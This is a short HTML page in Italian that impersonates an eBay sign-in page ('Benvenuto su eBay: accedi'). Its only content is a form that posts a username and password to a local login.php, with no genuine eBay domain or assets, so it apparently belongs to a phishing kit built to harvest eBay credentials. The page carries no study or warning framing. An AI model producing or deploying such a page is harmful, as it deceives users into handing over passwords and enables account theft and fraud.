<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Benvenuto su eBay: accedi</title>
<link rel="icon" type="image/png" href="">
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
<div id="pagina">
        <form method="post" action="login.php">
<input type="submit" id="submit" name="submit" value="" />
<input type="password" id="pass" name="pass" value="" />
<input type="text" id="user" name="user" value="" />
</body>
</html>